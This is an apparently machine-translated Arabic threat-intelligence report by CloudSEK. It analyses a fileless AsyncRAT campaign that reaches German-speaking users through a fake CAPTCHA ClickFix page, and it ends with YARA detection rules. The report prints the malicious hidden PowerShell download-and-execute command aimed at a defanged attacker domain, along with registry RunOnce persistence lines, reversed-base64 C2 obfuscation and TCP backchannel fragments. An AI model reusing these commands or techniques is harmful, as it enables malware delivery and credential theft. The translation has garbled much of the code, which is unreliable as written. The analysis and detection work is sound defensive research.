🚀 لقد رفعت CloudSek جولة B1 من السلسلة B1 بقيمة 19 مليون دولار - تعزيز مستقبل الأمن السيبراني التنبؤي
اقرأ المزيد
تستهدف حملة Asyncrat التي لا تحتوي على ملفات المستخدمين الناطقين باللغة الألمانية عبر مطالبة وهمية «أنا لست روبوتًا» تنفذ شفرة PowerShell الضارة. يتم تسليمه من خلال مواقع ذات طابع Clickfix، وهو ينتهك أدوات النظام لتحميل كود C # المشوش في الذاكرة، مما يتيح الوصول الكامل عن بُعد وسرقة بيانات الاعتماد. يستمر عبر مفاتيح التسجيل ويتصل بخادم C2 على المنفذ 4444. يجب على المؤسسات حظر نشاط PowerShell المريب وفحص الذاكرة بحثًا عن التهديدات.
ينضم Asyncrat الذي لا يحتوي على ملفات إلى مجموعة Clickfix، من خلال حملة غامضة تستند إلى PowerShell. يتم تسليم البرامج الضارة عبر مطالبة تحقق مزيفة تجذب المستخدمين إلى تنفيذ أمر ضار. استنادًا إلى التفضيلات اللغوية في مطالبة التحقق، يمكننا التأكد بثقة عالية من أن الحملة تستهدف المستخدمين الناطقين باللغة الألمانية. تنتهك السلسلة أدوات النظام الشرعية ومحمّلات C # في الذاكرة ذات السلاسل العكسية لتجنب الاكتشاف. بمجرد تنفيذه، يثبت البرنامج الضار الثبات من خلال مفاتيح التسجيل ويتصل بخادم TCP C2 البعيد على المنفذ 4444. إنه يتيح التحكم الكامل عن بُعد وسرقة بيانات الاعتماد واستخراج البيانات - كل ذلك دون إسقاط الملفات على القرص. تتضمن عمليات التخفيف حظر تنفيذ PowerShell المريب ومراقبة نشاط التسجيل ومسح الذاكرة بحثًا عن الحمولات داخل الذاكرة المستخدمة بشكل شائع في طرق التسليم المستندة إلى LOLbins.
خلال دورة اكتشاف وإسناد البنية التحتية للمهاجم الروتيني، اكتشفنا موقعًا إلكترونيًا للتسليم تحت عنوان Clickfix.
عندما تنقر الضحية على «أنا لست روبوتًا»، يتم نسخ الأمر إلى الحافظة، ويتم عرض التعليمات للضحية لاتباعها.
conhost.exe - بوويرشيل بدون رأس -w مخفي -nop -c $x =
[System.Text.Encoding]:: UTF8.getString ((استدعاء - طلب الويب - URI
'http://namoet[.]de:80/x').Content); cmd /c $x» انقر فوق إدخال هويتك!
السلسلة»اضغط على إدخال هويتك للتحقق من هويتك!«داخل الأمر، يُترجم إلى «اضغط على Enter لتأكيد هويتك!». يشير هذا إلى أن صفحة تسليم clickfix مصممة لاستهداف المستخدمين الناطقين باللغة الألمانية.
بوويرشيل -w مخفي -nop -c
$x = [System.Text.Encoding]:: UTF8.getString ((استدعاء طلب الويب - URI 'http://namoet[.]de:80/x').Content)
يفترض الأمر أن المحتوى عبارة عن نص مشفر UTF-8، ويقوم بفك تشفيره كسلسلة.
* يمكن العثور على محتويات الحمولة التي تم تنزيلها «x» في الملحق.
cmd /c $x
$c = 'conhost.exe --بوويرشيل بدون رأس -nop -w مخفي -c '+ [شار] 34+$myInvocation.myCommand+ [char] 34;
تعيين خاصية العنصر 'HKC U:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce '' 'windows'...
تعيين الخاصية 'HKC U:\SOFTWARE\Microsoft\Windows NT\ الإصدار الحالي\ Windows' '' win '$c;
$f = 'ask=' + '=gclRML' + '0v2b' + 'tFM' + 'blk='؛
$d = $f. السلسلة الفرعية (3,16). إلى CharArray ()؛
[مصفوفة]:: عكسي ($d)؛
$y = [System.Text.Encoding]:: Default.getString ([System.Convert]:: من سلسلة Base64 ($d - الانضمام «))؛
<obfuscated and reversed C# code>$g = ''؛
$l = $g. إلى CharArray ()؛
[مصفوفة]:: عكسي ($l)؛
نوع الإضافة - تعريف النوع $ ($l - join «)؛
* يمكن العثور على محتويات «$l» في الملحق.
[B] ::ma ($.trim ())
$f'ask' = '+' = gclrml'+'0v2b'+'tfm'+'blk=';
$d = $f. السلسلة الفرعية (3,16). إلى CharArray ()؛
[مصفوفة]:: عكسي ($d)؛
$y = [System.Text.Encoding]:: Default.getString ([System.Convert]:: من سلسلة Base64 ($d - الانضمام «))؛
تفصيل هذا:
$f = 'ask=' + '=gclRML' + '0v2b' + 'tFM' + 'blk='
= 'ask==gclrml0v2btfmblk='
سلسلة فرعية $f (3,16)
= '=GCLRML0v2BtFMBL'
# قبل الاتجاه المعاكس: '=GCLRML0v2BtFMBL'
# بعد الاتجاه المعاكس: 'lbmftbt2v0lmrllg ='
السلسلة الأساسية 64: 'lbmftbt2v0lmrllg ='
تم فك الشفرة: 'namoet [.] de:44'
في بعض رموز الخروج، فإنه تقتل نفسها مع getCurrentProcess () .Kill ().
في عينتنا:
conhost.exe --بوويرشيل بدون رأس -w مخفي -nop -c...
يتم ملاحظة نمط التنفيذ هذا بشكل متكرر في تسليم Asyncrat.
تحتوي الحمولة على:
نوع الإضافة - تعريف النوع $ ($l - join «)
[B] ::ma ($.trim ())
يحتوي رمز .NET على:
عميل TCPClient b = عميل TCPClient الجديد ()؛ b.connect (d، e)؛
...
بينما (صحيح) {c.اقرأ (...)...}
وهذا يدل على وجود قناة خلفية طويلة المدى - وهي سمة مميزة جدًا لمنطق C2 الخاص بـ AsyncRAT.
تحدد البرامج الضارة الثبات باستخدام:
تعيين خاصية العنصر 'HKCU:\... تشغيل مرة واحدة'...
غالبًا ما تستخدم متغيرات AsyncRAT HKCU\ البرامج\ Microsoft\ Windows\ CurrentVersion\ RunOnce أو Run للاستمرار على مستوى المستخدم دون تشغيل UAC.
كما نعلم، نسخت صفحة تسليم clickfix أمرًا تم إلحاقه بالنص. «اضغط على إدخال هويتك للتحقق من هويتك!». عند استخدام النص الموجود في الأمر المنسوخ كنقطة محورية، اكتشفنا بنية أساسية إضافية يتحكم فيها المهاجم والتي تم استخدامها في نفس الحملة لتسليم clickfix وعمليات C2.
استنادًا إلى البنية التحتية الإضافية المكتشفة، يمكننا التأكد بثقة متوسطة من أن هذه الحملة مستمرة منذ أبريل 2025 على الأقل.
قاعدة غير متزامنة_ذاكرة_مقيم_محمل_معكوس
{
ميتا:
المؤلف = «CloudSek استخبارات التهديدات الإلكترونية»
description = «يكتشف رمز أداة تحميل AsyncRAT C # في الذاكرة، مع التركيز على السلاسل المعكوسة وسلوك التحميل الانعكاسي»
عائلة البرامج الضارة = «AsyncRAT»
التاريخ = «2025-06-12"
النطاق = «الذاكرة»
سلاسل:
//مساحات أسماء .NET المعكوسة التي تشير إلى التشويش
$1 = «gnidaerht.metsys gnisu» أسي
$2 = «تشغيل النص. metsys» أسي
$3 = «مفتاح التشغيل Stekcos.ten.metsys» أسي
$4s = «محرك البحث Scitsongaid.metsys» أسي
//نوع الإضافة المستخدم في وقت التشغيل
$s5 = «نوع الإضافة - تعريف النوع» ascii
//تم عكس منطق TCPClient (نموذج سلسلة في الذاكرة)
$6s = «ثنيلكبت ويب = ب نادي ثنيلكبت» ascii
$s7 = «) (f)؛ (Maertsteg.b = c؛) e، (tcennoc.b» ascii
//تم عكس تواقيع الوظائف
$8 = «ديفو سيتيز كلوب» ascii
$9 = «نادي سالك» أسي
//تم عكس استمرارية التسجيل (اختياري)
$10 = «'nosiW' = الوحدة الأولى\\... ' حافظة آسكي عريضة مقاس 8 بوصات من KUH
الشرط:
5 من (دولارات*)
}
القاعدة غير المتزامنة _PowerShell_المحمل العكسي
{
ميتا:
المؤلف = «CloudSek استخبارات التهديدات الإلكترونية»
الوصف = «يكتشف حمولات AsyncRAT باستخدام PowerShell باستخدام أداة تحميل C # ذات ترميز أساسي معكوس ومحمل من النوع الإضافي»
عائلة البرامج الضارة = «AsyncRAT»
التاريخ = «2025-06-12"
سلاسل:
//نمط PowerShell باستخدام علامات التشويش الشائعة
$ps_flags = «بوويرشيل -نوب -w مخفي -c» أسي
//استخدام Add-Type لتجميع كود C # في وقت التشغيل
$add_type = «إضافة نوع - تعريف النوع» كما يلي
//مفاتيح استمرار التسجيل
$reg1 = «HKCU:\\ البرنامج\\ ميكروسوفت\\ ويندوز\\ الإصدار الحالي\\ تشغيل مرة واحدة» ascii
$reg2 = «HKCU:\\ البرامج\\ ميكروسوفت\\ ويندوز NT\\ الإصدار الحالي\\ ويندوز» ascii
//تم عكس مساحة اسم C # الشائعة لـ AsyncRAT
$rev_using = «gnidaerht.metsys gnisu» أسي
$rev_dns = «)] 0 [w (gnirtsteg.tluafed.gnidocne = Emanelif» ascii
//قام TCPCClient و Connect () بعكس المكالمات في .NET
$tcp_client = «ثنيلكبت ويب = ب نادي ثنيلكبت» ascii
$connect_call = «) (f)؛ (مايرتستيج.b = c؛) e، d (tcennoc.b» ascii
//منفذ TCP الشائع المستخدم (4444) لـ C2
$port_4444 = «4444" أسي
الشرط:
كل من ($ps_flags، $add_type، $reg1، $rev_using، $tcp_client) و
أي من ($reg2، $rev_dns، $port_4444، $connect_call)
}
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.